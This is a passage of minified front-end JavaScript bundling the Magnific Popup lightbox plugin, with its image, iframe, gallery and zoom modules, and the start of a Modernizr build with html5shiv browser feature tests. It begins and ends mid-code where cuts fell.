"),t._removeClassFromMFP(n),t.fixedContentPos){var r={marginRight:""};t.isIE7?e("body, html").css("overflow",""):r.overflow="",e("html").css(r)}i.off("keyup"+m+" focusin"+m),t.ev.off(m),t.wrap.attr("class","mfp-wrap").removeAttr("style"),t.bgOverlay.attr("class","mfp-bg"),t.container.attr("class","mfp-container"),!t.st.showCloseBtn||t.st.closeBtnInside&&t.currTemplate[t.currItem.type]!==!0||t.currTemplate.closeBtn&&t.currTemplate.closeBtn.detach(),t._lastFocusedEl&&e(t._lastFocusedEl).focus(),t.currItem=null,t.content=null,t.currTemplate=null,t.prevHeight=0,T(d)},updateSize:function(e){if(t.isIOS){var n=document.documentElement.clientWidth/window.innerWidth,i=window.innerHeight*n;t.wrap.css("height",i),t.wH=i}else t.wH=e||w.height();t.fixedContentPos||t.wrap.css("height",t.wH),T("Resize")},updateItemHTML:function(){var n=t.items[t.index];t.contentContainer.detach(),t.content&&t.content.detach(),n.parsed||(n=t.parseEl(t.index));var i=n.type;if(T("BeforeChange",[t.currItem?t.currItem.type:"",i]),t.currItem=n,!t.currTemplate[i]){var o=t.st[i]?t.st[i].markup:!1;T("FirstMarkupParse",o),o?t.currTemplate[i]=e(o):t.currTemplate[i]=!0}r&&r!==n.type&&t.container.removeClass("mfp-"+r+"-holder");var s=t["get"+i.charAt(0).toUpperCase()+i.slice(1)](n,t.currTemplate[i]);t.appendContent(s,i),n.preloaded=!0,T(f,n),r=n.type,t.container.prepend(t.contentContainer),T("AfterChange")},appendContent:function(e,n){t.content=e,e?t.st.showCloseBtn&&t.st.closeBtnInside&&t.currTemplate[n]===!0?t.content.find(".mfp-close").length||t.content.append(E()):t.content=e:t.content="",T(c),t.container.addClass("mfp-"+n+"-holder"),t.contentContainer.append(t.content)},parseEl:function(n){var i,r=t.items[n];if(r.tagName?r={el:e(r)}:(i=r.type,r={data:r,src:r.src}),r.el){for(var o=t.types,s=0;s<o.length;s++)if(r.el.hasClass("mfp-"+o[s])){i=o[s];break}r.src=r.el.attr("data-mfp-src"),r.src||(r.src=r.el.attr("href"))}return r.type=i||t.st.type||"inline",r.index=n,r.parsed=!0,t.items[n]=r,T("ElementParse",r),t.items[n]},addGroup:function(e,n){ var i=function(i){i.mfpEl=this,t._openClick(i,e,n)};n||(n={});var r="click.magnificPopup";n.mainEl=e,n.items?(n.isObj=!0,e.off(r).on(r,i)):(n.isObj=!1,n.delegate?e.off(r).on(r,n.delegate,i):(n.items=e,e.off(r).on(r,i)))},_openClick:function(n,i,r){var o=void 0!==r.midClick?r.midClick:e.magnificPopup.defaults.midClick;if(o||!(2===n.which||n.ctrlKey||n.metaKey||n.altKey||n.shiftKey)){var s=void 0!==r.disableOn?r.disableOn:e.magnificPopup.defaults.disableOn;if(s)if(e.isFunction(s)){if(!s.call(t))return!0}else if(w.width()<s)return!0;n.type&&(n.preventDefault(),t.isOpen&&n.stopPropagation()),r.el=e(n.mfpEl),r.delegate&&(r.items=i.find(r.delegate)),t.open(r)}},updateStatus:function(e,i){if(t.preloader){n!==e&&t.container.removeClass("mfp-s-"+n),i||"loading"!==e||(i=t.st.tLoading);var r={status:e,text:i};T("UpdateStatus",r),e=r.status,i=r.text,t.preloader.html(i),t.preloader.find("a").on("click",function(e){e.stopImmediatePropagation()}),t.container.addClass("mfp-s-"+e),n=e}},_checkIfClose:function(n){if(!e(n).hasClass(v)){var i=t.st.closeOnContentClick,r=t.st.closeOnBgClick;if(i&&r)return!0;if(!t.content||e(n).hasClass("mfp-close")||t.preloader&&n===t.preloader[0])return!0;if(n===t.content[0]||e.contains(t.content[0],n)){if(i)return!0}else if(r&&e.contains(document,n))return!0;return!1}},_addClassToMFP:function(e){t.bgOverlay.addClass(e),t.wrap.addClass(e)},_removeClassFromMFP:function(e){this.bgOverlay.removeClass(e),t.wrap.removeClass(e)},_hasScrollBar:function(e){return(t.isIE7?i.height():document.body.scrollHeight)>(e||w.height())},_setFocus:function(){(t.st.focus?t.content.find(t.st.focus).eq(0):t.wrap).focus()},_onFocusIn:function(n){return n.target===t.wrap[0]||e.contains(t.wrap[0],n.target)?void 0:(t._setFocus(),!1)},_parseMarkup:function(t,n,i){var r;i.data&&(n=e.extend(i.data,n)),T(u,[t,n,i]),e.each(n,function(e,n){if(void 0===n||n===!1)return!0;if(r=e.split("_"),r.length>1){var i=t.find(m+"-"+r[0]);if(i.length>0){var o=r[1];"replaceWith"===o?i[0]!==n[0]&&i.replaceWith(n):"img"===o?i.is("img")?i.attr("src",n):i.replaceWith('<img src="'+n+'" class="'+i.attr("class")+'" />'):i.attr(r[1],n)}}else t.find(m+"-"+e).html(n)})},_getScrollbarSize:function(){if(void 0===t.scrollbarSize){var e=document.createElement("div");e.style.cssText="width: 99px; height: 99px; overflow: scroll; position: absolute; top: -9999px;",document.body.appendChild(e),t.scrollbarSize=e.offsetWidth-e.clientWidth,document.body.removeChild(e)}return t.scrollbarSize}},e.magnificPopup={instance:null,proto:y.prototype,modules:[],open:function(t,n){return C(),t=t?e.extend(!0,{},t):{},t.isObj=!0,t.index=n||0,this.instance.open(t)},close:function(){return e.magnificPopup.instance&&e.magnificPopup.instance.close()},registerModule:function(t,n){n.options&&(e.magnificPopup.defaults[t]=n.options),e.extend(this.proto,n.proto),this.modules.push(t)},defaults:{disableOn:0,key:null,midClick:!1,mainClass:"",preloader:!0,focus:"",closeOnContentClick:!1,closeOnBgClick:!0,closeBtnInside:!0,showCloseBtn:!0,enableEscapeKey:!0,modal:!1,alignTop:!1,removalDelay:0,prependTo:null,fixedContentPos:"auto",fixedBgPos:"auto",overflowY:"auto",closeMarkup:'<button title="%title%" type="button" class="mfp-close">&#215;</button>',tClose:"Close (Esc)",tLoading:"Loading..."}},e.fn.magnificPopup=function(n){C();var i=e(this);if("string"==typeof n)if("open"===n){var r,o=b?i.data("magnificPopup"):i[0].magnificPopup,s=parseInt(arguments[1],10)||0;o.items?r=o.items[s]:(r=i,o.delegate&&(r=r.find(o.delegate)),r=r.eq(s)),t._openClick({mfpEl:r},i,o)}else t.isOpen&&t[n].apply(t,Array.prototype.slice.call(arguments,1));else n=e.extend(!0,{},n),b?i.data("magnificPopup",n):i[0].magnificPopup=n,t.addGroup(i,n);return i};var k,z,S,B="inline",N=function(){S&&(z.after(S.addClass(k)).detach(),S=null)};e.magnificPopup.registerModule(B,{options:{hiddenClass:"hide",markup:"",tNotFound:"Content not found"},proto:{initInline:function(){t.types.push(B),_(a+"."+B,function(){N()})},getInline:function(n,i){if(N(),n.src){var r=t.st.inline,o=e(n.src);if(o.length){var s=o[0].parentNode;s&&s.tagName&&(z||(k=r.hiddenClass,z=x(k),k="mfp-"+k),S=o.after(z).detach().removeClass(k)),t.updateStatus("ready")}else t.updateStatus("error",r.tNotFound),o=e("<div>");return n.inlineElement=o,o}return t.updateStatus("ready"),t._parseMarkup(i,{},n),i}}});var P,j="ajax",R=function(){P&&e(document.body).removeClass(P)},D=function(){R(),t.req&&t.req.abort()};e.magnificPopup.registerModule(j,{options:{settings:null,cursor:"mfp-ajax-cur",tError:'<a href="%url%">The content</a> could not be loaded.'},proto:{initAjax:function(){t.types.push(j),P=t.st.ajax.cursor,_(a+"."+j,D),_("BeforeChange."+j,D)},getAjax:function(n){P&&e(document.body).addClass(P),t.updateStatus("loading");var i=e.extend({url:n.src,success:function(i,r,o){var s={data:i,xhr:o};T("ParseAjax",s),t.appendContent(e(s.data),j),n.finished=!0,R(),t._setFocus(),setTimeout(function(){t.wrap.addClass(g)},16),t.updateStatus("ready"),T("AjaxContentAdded")},error:function(){R(),n.finished=n.loadError=!0,t.updateStatus("error",t.st.ajax.tError.replace("%url%",n.src))}},t.st.ajax.settings);return t.req=e.ajax(i),""}}});var F,I=function(n){if(n.data&&void 0!==n.data.title)return n.data.title;var i=t.st.image.titleSrc;if(i){if(e.isFunction(i))return i.call(t,n);if(n.el)return n.el.attr(i)||""}return""};e.magnificPopup.registerModule("image",{options:{markup:'<div class="mfp-figure"><div class="mfp-close"></div><figure><div class="mfp-img"></div><figcaption><div class="mfp-bottom-bar"><div class="mfp-title"></div><div class="mfp-counter"></div></div></figcaption></figure></div>',cursor:"mfp-zoom-out-cur",titleSrc:"title",verticalFit:!0,tError:'<a href="%url%">The image</a> could not be loaded.'},proto:{initImage:function(){var n=t.st.image,i=".image";t.types.push("image"),_(p+i,function(){"image"===t.currItem.type&&n.cursor&&e(document.body).addClass(n.cursor)}),_(a+i,function(){n.cursor&&e(document.body).removeClass(n.cursor),w.off("resize"+m)}),_("Resize"+i,t.resizeImage),t.isLowIE&&_("AfterChange",t.resizeImage)},resizeImage:function(){var e=t.currItem;if(e&&e.img&&t.st.image.verticalFit){var n=0;t.isLowIE&&(n=parseInt(e.img.css("padding-top"),10)+parseInt(e.img.css("padding-bottom"),10)),e.img.css("max-height",t.wH-n)}},_onImageHasSize:function(e){e.img&&(e.hasSize=!0,F&&clearInterval(F),e.isCheckingImgSize=!1,T("ImageHasSize",e),e.imgHidden&&(t.content&&t.content.removeClass("mfp-loading"),e.imgHidden=!1))},findImageSize:function(e){var n=0,i=e.img[0],r=function(o){F&&clearInterval(F),F=setInterval(function(){return i.naturalWidth>0?void t._onImageHasSize(e):(n>200&&clearInterval(F),n++,void(3===n?r(10):40===n?r(50):100===n&&r(500)))},o)};r(1)},getImage:function(n,i){var r=0,o=function(){n&&(n.img[0].complete?(n.img.off(".mfploader"),n===t.currItem&&(t._onImageHasSize(n),t.updateStatus("ready")),n.hasSize=!0,n.loaded=!0,T("ImageLoadComplete")):(r++,200>r?setTimeout(o,100):s()))},s=function(){n&&(n.img.off(".mfploader"),n===t.currItem&&(t._onImageHasSize(n),t.updateStatus("error",a.tError.replace("%url%",n.src))),n.hasSize=!0,n.loaded=!0,n.loadError=!0)},a=t.st.image,l=i.find(".mfp-img");if(l.length){var d=document.createElement("img");d.className="mfp-img",n.el&&n.el.find("img").length&&(d.alt=n.el.find("img").attr("alt")),n.img=e(d).on("load.mfploader",o).on("error.mfploader",s),d.src=n.src,l.is("img")&&(n.img=n.img.clone()),d=n.img[0],d.naturalWidth>0?n.hasSize=!0:d.width||(n.hasSize=!1)}return t._parseMarkup(i,{title:I(n),img_replaceWith:n.img},n),t.resizeImage(),n.hasSize?(F&&clearInterval(F),n.loadError?(i.addClass("mfp-loading"),t.updateStatus("error",a.tError.replace("%url%",n.src))):(i.removeClass("mfp-loading"),t.updateStatus("ready")),i):(t.updateStatus("loading"),n.loading=!0,n.hasSize||(n.imgHidden=!0,i.addClass("mfp-loading"),t.findImageSize(n)),i)}}});var L,H=function(){return void 0===L&&(L=void 0!==document.createElement("p").style.MozTransform),L};e.magnificPopup.registerModule("zoom",{options:{enabled:!1,easing:"ease-in-out",duration:300,opener:function(e){return e.is("img")?e:e.find("img")}},proto:{initZoom:function(){var e,n=t.st.zoom,i=".zoom";if(n.enabled&&t.supportsTransition){var r,o,s=n.duration,d=function(e){var t=e.clone().removeAttr("style").removeAttr("class").addClass("mfp-animated-image"),i="all "+n.duration/1e3+"s "+n.easing,r={position:"fixed",zIndex:9999,left:0,top:0,"-webkit-backface-visibility":"hidden"},o="transition";return r["-webkit-"+o]=r["-moz-"+o]=r["-o-"+o]=r[o]=i,t.css(r),t},c=function(){t.content.css("visibility","visible")};_("BuildControls"+i,function(){if(t._allowZoom()){if(clearTimeout(r),t.content.css("visibility","hidden"),e=t._getItemToZoom(),!e)return void c();o=d(e),o.css(t._getOffset()),t.wrap.append(o),r=setTimeout(function(){o.css(t._getOffset(!0)),r=setTimeout(function(){c(),setTimeout(function(){o.remove(),e=o=null,T("ZoomAnimationEnded")},16)},s)},16)}}),_(l+i,function(){if(t._allowZoom()){if(clearTimeout(r),t.st.removalDelay=s,!e){if(e=t._getItemToZoom(),!e)return;o=d(e)}o.css(t._getOffset(!0)),t.wrap.append(o),t.content.css("visibility","hidden"),setTimeout(function(){o.css(t._getOffset())},16)}}),_(a+i,function(){t._allowZoom()&&(c(),o&&o.remove(),e=null)})}},_allowZoom:function(){return"image"===t.currItem.type},_getItemToZoom:function(){return t.currItem.hasSize?t.currItem.img:!1},_getOffset:function(n){var i;i=n?t.currItem.img:t.st.zoom.opener(t.currItem.el||t.currItem);var r=i.offset(),o=parseInt(i.css("padding-top"),10),s=parseInt(i.css("padding-bottom"),10);r.top-=e(window).scrollTop()-o;var a={width:i.width(),height:(b?i.innerHeight():i[0].offsetHeight)-s-o};return H()?a["-moz-transform"]=a.transform="translate("+r.left+"px,"+r.top+"px)":(a.left=r.left,a.top=r.top),a}}});var O="iframe",Q="//about:blank",W=function(e){if(t.currTemplate[O]){var n=t.currTemplate[O].find("iframe");n.length&&(e||(n[0].src=Q),t.isIE8&&n.css("display",e?"block":"none"))}};e.magnificPopup.registerModule(O,{options:{markup:'<div class="mfp-iframe-scaler"><div class="mfp-close"></div><iframe class="mfp-iframe" src="//about:blank" frameborder="0" allowfullscreen></iframe></div>',srcAction:"iframe_src",patterns:{youtube:{index:"youtube.com",id:"v=",src:"//www.youtube.com/embed/%id%?autoplay=1"},vimeo:{index:"vimeo.com/",id:"/",src:"//player.vimeo.com/video/%id%?autoplay=1"},gmaps:{index:"//maps.google.",src:"%id%&output=embed"}}},proto:{initIframe:function(){t.types.push(O),_("BeforeChange",function(e,t,n){t!==n&&(t===O?W():n===O&&W(!0))}),_(a+"."+O,function(){W()})},getIframe:function(n,i){var r=n.src,o=t.st.iframe;e.each(o.patterns,function(){return r.indexOf(this.index)>-1?(this.id&&(r="string"==typeof this.id?r.substr(r.lastIndexOf(this.id)+this.id.length,r.length):this.id.call(this,r)),r=this.src.replace("%id%",r),!1):void 0});var s={};return o.srcAction&&(s[o.srcAction]=r),t._parseMarkup(i,s,n),t.updateStatus("ready"),i}}});var q=function(e){var n=t.items.length;return e>n-1?e-n:0>e?n+e:e},U=function(e,t,n){return e.replace(/%curr%/gi,t+1).replace(/%total%/gi,n)};e.magnificPopup.registerModule("gallery",{options:{enabled:!1,arrowMarkup:'<button title="%title%" type="button" class="mfp-arrow mfp-arrow-%dir%"></button>',preload:[0,2],navigateByImgClick:!0,arrows:!0,tPrev:"Previous (Left arrow key)",tNext:"Next (Right arrow key)",tCounter:"%curr% of %total%"},proto:{initGallery:function(){var n=t.st.gallery,r=".mfp-gallery",s=Boolean(e.fn.mfpFastClick);return t.direction=!0,n&&n.enabled?(o+=" mfp-gallery",_(p+r,function(){n.navigateByImgClick&&t.wrap.on("click"+r,".mfp-img",function(){return t.items.length>1?(t.next(),!1):void 0}),i.on("keydown"+r,function(e){37===e.keyCode?t.prev():39===e.keyCode&&t.next()})}),_("UpdateStatus"+r,function(e,n){n.text&&(n.text=U(n.text,t.currItem.index,t.items.length))}),_(u+r,function(e,i,r,o){var s=t.items.length;r.counter=s>1?U(n.tCounter,o.index,s):""}),_("BuildControls"+r,function(){if(t.items.length>1&&n.arrows&&!t.arrowLeft){var i=n.arrowMarkup,r=t.arrowLeft=e(i.replace(/%title%/gi,n.tPrev).replace(/%dir%/gi,"left")).addClass(v),o=t.arrowRight=e(i.replace(/%title%/gi,n.tNext).replace(/%dir%/gi,"right")).addClass(v),a=s?"mfpFastClick":"click";r[a](function(){t.prev()}),o[a](function(){t.next()}),t.isIE7&&(x("b",r[0],!1,!0),x("a",r[0],!1,!0),x("b",o[0],!1,!0),x("a",o[0],!1,!0)),t.container.append(r.add(o))}}),_(f+r,function(){t._preloadTimeout&&clearTimeout(t._preloadTimeout),t._preloadTimeout=setTimeout(function(){t.preloadNearbyImages(),t._preloadTimeout=null},16)}),void _(a+r,function(){i.off(r),t.wrap.off("click"+r),t.arrowLeft&&s&&t.arrowLeft.add(t.arrowRight).destroyMfpFastClick(),t.arrowRight=t.arrowLeft=null})):!1},next:function(){t.direction=!0,t.index=q(t.index+1),t.updateItemHTML()},prev:function(){t.direction=!1,t.index=q(t.index-1),t.updateItemHTML()},goTo:function(e){t.direction=e>=t.index,t.index=e,t.updateItemHTML()},preloadNearbyImages:function(){var e,n=t.st.gallery.preload,i=Math.min(n[0],t.items.length),r=Math.min(n[1],t.items.length);for(e=1;e<=(t.direction?r:i);e++)t._preloadItem(t.index+e);for(e=1;e<=(t.direction?i:r);e++)t._preloadItem(t.index-e)},_preloadItem:function(n){if(n=q(n),!t.items[n].preloaded){var i=t.items[n];i.parsed||(i=t.parseEl(n)),T("LazyLoad",i),"image"===i.type&&(i.img=e('<img class="mfp-img" />').on("load.mfploader",function(){i.hasSize=!0}).on("error.mfploader",function(){i.hasSize=!0,i.loadError=!0,T("LazyLoadError",i)}).attr("src",i.src)),i.preloaded=!0}}}});var V="retina";e.magnificPopup.registerModule(V,{options:{replaceSrc:function(e){return e.src.replace(/\.\w+$/,function(e){return"@2x"+e})},ratio:1},proto:{initRetina:function(){if(window.devicePixelRatio>1){var e=t.st.retina,n=e.ratio;n=isNaN(n)?n():n,n>1&&(_("ImageHasSize."+V,function(e,t){t.img.css({"max-width":t.img[0].naturalWidth/n,width:"100%"})}),_("ElementParse."+V,function(t,i){i.src=e.replaceSrc(i,n)}))}}}}),function(){var t=1e3,n="ontouchstart"in window,i=function(){w.off("touchmove"+o+" touchend"+o)},r="mfpFastClick",o="."+r;e.fn.mfpFastClick=function(r){return e(this).each(function(){var s,a=e(this);if(n){var l,d,c,u,p,f;a.on("touchstart"+o,function(e){u=!1,f=1,p=e.originalEvent?e.originalEvent.touches[0]:e.touches[0],d=p.clientX,c=p.clientY,w.on("touchmove"+o,function(e){p=e.originalEvent?e.originalEvent.touches:e.touches,f=p.length,p=p[0],(Math.abs(p.clientX-d)>10||Math.abs(p.clientY-c)>10)&&(u=!0,i())}).on("touchend"+o,function(e){i(),u||f>1||(s=!0,e.preventDefault(),clearTimeout(l),l=setTimeout(function(){s=!1},t),r())})})}a.on("click"+o,function(){s||r()})})},e.fn.destroyMfpFastClick=function(){e(this).off("touchstart"+o+" click"+o),n&&w.off("touchmove"+o+" touchend"+o)}}(),C()}),!function(window,document,undefined){function setClasses(e){var t=docElement.className,n=Modernizr._config.classPrefix||"";if(isSVG&&(t=t.baseVal),Modernizr._config.enableJSClass){var i=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(i,"$1"+n+"js$2")}Modernizr._config.enableClasses&&(t+=" "+n+e.join(" "+n),isSVG?docElement.className.baseVal=t:docElement.className=t)}function is(e,t){return typeof e===t}function testRunner(){var e,t,n,i,r,o,s;for(var a in tests)if(tests.hasOwnProperty(a)){if(e=[],t=tests[a],t.name&&(e.push(t.name.toLowerCase()),t.options&&t.options.aliases&&t.options.aliases.length))for(n=0;n<t.options.aliases.length;n++)e.push(t.options.aliases[n].toLowerCase());for(i=is(t.fn,"function")?t.fn():t.fn,r=0;r<e.length;r++)o=e[r],s=o.split("."),1===s.length?Modernizr[s[0]]=i:(!Modernizr[s[0]]||Modernizr[s[0]]instanceof Boolean||(Modernizr[s[0]]=new Boolean(Modernizr[s[0]])),Modernizr[s[0]][s[1]]=i),classes.push((i?"":"no-")+s.join("-"))}}function addTest(e,t){if("object"==typeof e)for(var n in e)hasOwnProp(e,n)&&addTest(n,e[n]);else{e=e.toLowerCase();var i=e.split("."),r=Modernizr[i[0]];if(2==i.length&&(r=r[i[1]]),"undefined"!=typeof r)return Modernizr;t="function"==typeof t?t():t,1==i.length?Modernizr[i[0]]=t:(!Modernizr[i[0]]||Modernizr[i[0]]instanceof Boolean||(Modernizr[i[0]]=new Boolean(Modernizr[i[0]])),Modernizr[i[0]][i[1]]=t),setClasses([(t&&0!=t?"":"no-")+i.join("-")]),Modernizr._trigger(e,t)}return Modernizr}function createElement(){return"function"!=typeof document.createElement?document.createElement(arguments[0]):isSVG?document.createElementNS.call(document,"http://www.w3.org/2000/svg",arguments[0]):document.createElement.apply(document,arguments)}function cssToDOM(e){return e.replace(/([a-z])-([a-z])/g,function(e,t,n){return t+n.toUpperCase()}).replace(/^-/,"")}function domToCSS(e){return e.replace(/([A-Z])/g,function(e,t){return"-"+t.toLowerCase()}).replace(/^ms-/,"-ms-")}function getBody(){var e=document.body;return e||(e=createElement(isSVG?"svg":"body"),e.fake=!0),e}function injectElementWithStyles(e,t,n,i){var r,o,s,a,l="modernizr",d=createElement("div"),c=getBody();if(parseInt(n,10))for(;n--;)s=createElement("div"),s.id=i?i[n]:l+(n+1),d.appendChild(s);return r=createElement("style"),r.type="text/css",r.id="s"+l,(c.fake?c:d).appendChild(r),c.appendChild(d),r.styleSheet?r.styleSheet.cssText=e:r.appendChild(document.createTextNode(e)),d.id=l,c.fake&&(c.style.background="",c.style.overflow="hidden",a=docElement.style.overflow,docElement.style.overflow="hidden",docElement.appendChild(c)),o=t(d,e),c.fake?(c.parentNode.removeChild(c),docElement.style.overflow=a,docElement.offsetHeight):d.parentNode.removeChild(d),!!o}function contains(e,t){return!!~(""+e).indexOf(t)}function roundedEquals(e,t){return e-1===t||e===t||e+1===t}function nativeTestProps(e,t){var n=e.length;if("CSS"in window&&"supports"in window.CSS){for(;n--;)if(window.CSS.supports(domToCSS(e[n]),t))return!0;return!1}if("CSSSupportsRule"in window){for(var i=[];n--;)i.push("("+domToCSS(e[n])+":"+t+")");return i=i.join(" or "),injectElementWithStyles("@supports ("+i+") { #modernizr { position: absolute; } }",function(e){return"absolute"==getComputedStyle(e,null).position})}return undefined}function testProps(e,t,n,i){function r(){s&&(delete mStyle.style,delete mStyle.modElem)}if(i=is(i,"undefined")?!1:i,!is(n,"undefined")){var o=nativeTestProps(e,n);if(!is(o,"undefined"))return o}for(var s,a,l,d,c,u=["modernizr","tspan"];!mStyle.style;)s=!0,mStyle.modElem=createElement(u.shift()),mStyle.style=mStyle.modElem.style;for(l=e.length,a=0;l>a;a++)if(d=e[a],c=mStyle.style[d],contains(d,"-")&&(d=cssToDOM(d)),mStyle.style[d]!==undefined){if(i||is(n,"undefined"))return r(),"pfx"==t?d:!0;try{mStyle.style[d]=n}catch(p){}if(mStyle.style[d]!=c)return r(),"pfx"==t?d:!0}return r(),!1}function fnBind(e,t){return function(){return e.apply(t,arguments)}}function testDOMProps(e,t,n){var i;for(var r in e)if(e[r]in t)return n===!1?e[r]:(i=t[e[r]],is(i,"function")?fnBind(i,n||t):i);return!1}function testPropsAll(e,t,n,i,r){var o=e.charAt(0).toUpperCase()+e.slice(1),s=(e+" "+cssomPrefixes.join(o+" ")+o).split(" ");return is(t,"string")||is(t,"undefined")?testProps(s,t,i,r):(s=(e+" "+domPrefixes.join(o+" ")+o).split(" "),testDOMProps(s,t,n))}function testAllProps(e,t,n){return testPropsAll(e,undefined,undefined,t,n)}var classes=[],docElement=document.documentElement,isSVG="svg"===docElement.nodeName.toLowerCase(),html5;isSVG||!function(e,t){function n(e,t){var n=e.createElement("p"),i=e.getElementsByTagName("head")[0]||e.documentElement;return n.innerHTML="x<style>"+t+"</style>",i.insertBefore(n.lastChild,i.firstChild)}function i(){var e=y.elements;return"string"==typeof e?e.split(" "):e}function r(e,t){var n=y.elements;"string"!=typeof n&&(n=n.join(" ")),"string"!=typeof e&&(e=e.join(" ")),y.elements=n+" "+e,d(t)}function o(e){var t=v[e[g]];return t||(t={},A++,e[g]=A,v[A]=t),t}function s(e,n,i){if(n||(n=t),u)return n.createElement(e);i||(i=o(n));var r;return r=i.cache[e]?i.cache[e].cloneNode():m.test(e)?(i.cache[e]=i.createElem(e)).cloneNode():i.createElem(e),!r.canHaveChildren||h.test(e)||r.tagUrn?r:i.frag.appendChild(r)}function a(e,n){if(e||(e=t),u)return e.createDocumentFragment();n=n||o(e);for(var r=n.frag.cloneNode(),s=0,a=i(),l=a.length;l>s;s++)r.createElement(a[s]);return r}function l(e,t){t.cache||(t.cache={},t.createElem=e.createElement,t.createFrag=e.createDocumentFragment,t.frag=t.createFrag()),e.createElement=function(n){return y.shivMethods?s(n,e,t):t.createElem(n)},e.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+i().join().replace(/[\w\-:]+/g,function(e){return t.createElem(e),t.frag.createElement(e),'c("'+e+'")'})+");return n}")(y,t.frag)}function d(e){e||(e=t);var i=o(e);return!y.shivCSS||c||i.hasCSS||(i.hasCSS=!!n(e,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),u||l(e,i),e}var c,u,p="3.7.3",f=e.html5||{},h=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,m=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,g="_html5shiv",A=0,v={};!function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",c="hidden"in e,u=1==e.childNodes.length||function(){t.createElement("a");var e=t.createDocumentFragment();return"undefined"==typeof e.cloneNode||"undefined"==typeof e.createDocumentFragment||"undefined"==typeof e.createElement}()}catch(n){c=!0,u=!0}}();var y={elements:f.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:p,shivCSS:f.shivCSS!==!1,supportsUnknownElements:u,shivMethods:f.shivMethods!==!1,type:"default",shivDocument:d,createElement:s,createDocumentFragment:a,addElements:r};e.html5=y,d(t),"object"==typeof module&&module.exports&&(module.exports=y)}("undefined"!=typeof window?window:this,document);var tests=[],ModernizrProto={_version:"3.1.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){tests.push({name:e,fn:t,options:n})},addAsyncTest:function(e){tests.push({name:null,fn:e})}},Modernizr=function(){};Modernizr.prototype=ModernizrProto,Modernizr=new Modernizr,Modernizr.addTest("applicationcache","applicationCache"in window),Modernizr.addTest("blobconstructor",function(){try{return!!new Blob}catch(e){return!1}},{aliases:["blob-constructor"]}),Modernizr.addTest("contextmenu","contextMenu"in docElement&&"HTMLMenuItemElement"in window),Modernizr.addTest("cookies",function(){try{document.cookie="cookietest=1";var e=-1!=document.cookie.indexOf("cookietest=");return document.cookie="cookietest=1; expires=Thu, 01-Jan-1970 00:00:01 GMT",e}catch(t){return!1}}),Modernizr.addTest("cors","XMLHttpRequest"in window&&"withCredentials"in new XMLHttpRequest),Modernizr.addTest("customprotocolhandler",function(){if(!navigator.registerProtocolHandler)return!1;try{navigator.registerProtocolHandler("thisShouldFail")}catch(e){return e instanceof TypeError}return!1}),Modernizr.addTest("customevent","CustomEvent"in window&&"function"==typeof window.CustomEvent),Modernizr.addTest("eventlistener","addEventListener"in window),Modernizr.addTest("dataview","undefined"!=typeof DataView&&"getFloat64"in DataView.prototype),Modernizr.addTest("geolocation","geolocation"in navigator),Modernizr.addTest("history",function(){var e=navigator.userAgent;return-1===e.indexOf("Android 2.")&&-1===e.indexOf("Android 4.0")||-1===e.indexOf("Mobile Safari")||-1!==e.indexOf("Chrome")||-1!==e.indexOf("Windows Phone")?window.history&&"pushState"in window.history:!1}),Modernizr.addTest("ie8compat",!window.addEventListener&&!!document.documentMode&&7===document.documentMode),Modernizr.addTest("json","JSON"in window&&"parse"in JSON&&"stringify"in JSON),Modernizr.addTest("notification","Notification"in window&&"permission"in window.Notification&&"requestPermission"in window.Notification),Modernizr.addTest("postmessage","postMessage"in window),Modernizr.addTest("queryselector","querySelector"in document&&"querySelectorAll"in document),Modernizr.addTest("svg",!!document.createElementNS&&!!document.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect),Modernizr.addTest("serviceworker","serviceWorker"in navigator),Modernizr.addTest("templatestrings",function(){var supports;try{eval("``"),supports=!0}catch(e){}return!!supports}),Modernizr.addTest("typedarrays","ArrayBuffer"in window),Modernizr.addTest("websockets","WebSocket"in window&&2===window.WebSocket.CLOSING),Modernizr.addTest("webaudio",function(){var e="webkitAudioContext"in window,t="AudioContext"in window;return Modernizr._config.usePrefixes?e||t:t}),Modernizr.addTest("cssall","all"in docElement.style);var CSS=window.CSS;Modernizr.addTest("cssescape",CSS?"function"==typeof CSS.escape:!1),Modernizr.addTest("target",function(){var e=window.document;if(!("querySelectorAll"in e))return!1;try{return e.querySelectorAll(":target"),!0}catch(t){return!1}});var newSyntax="CSS"in window&&"supports"in window.CSS,oldSyntax="supportsCSS"in window;Modernizr.addTest("supports",newSyntax||oldSyntax),Modernizr.addTest("willchange","willChange"in docElement.style),Modernizr.addTest("classlist","classList"in docElement),Modernizr.addTest("documentfragment",function(){return"createDocumentFragment"in document&&"appendChild"in docElement}),Modernizr.addTest("microdata","getItems"in document),Modernizr.addTest("mutationobserver",!!window.MutationObserver||!!window.WebKitMutationObserver),Modernizr.addTest("picture","HTMLPictureElement"in window),Modernizr.addTest("es5array",function(){return!!(Array.prototype&&Array.prototype.every&&Array.prototype.filter&&Array.prototype.forEach&&Array.prototype.indexOf&&Array.prototype.lastIndexOf&&Array.prototype.map&&Array.prototype.some&&Array.prototype.reduce&&Array.prototype.reduceRight&&Array.isArray)}),Modernizr.addTest("es5date",function(){var e="2013-04-12T06:06:37.307Z",t=!1;try{t=!!Date.parse(e)}catch(n){}return!!(Date.now&&Date.prototype&&Date.prototype.toISOString&&Date.prototype.toJSON&&t)}),Modernizr.addTest("es5function",function(){return!(!Function.prototype||!Function.prototype.bind)}),Modernizr.addTest("es5object",function(){return!!(Object.keys&&Object.create&&Object.getPrototypeOf&&Object.getOwnPropertyNames&&Object.isSealed&&Object.isFrozen&&Object.isExtensible&&Object.getOwnPropertyDescriptor&&Object.defineProperty&&Object.defineProperties&&Object.seal&&Object.freeze&&Object.preventExtensions)}),Modernizr.addTest("strictmode",function(){"use 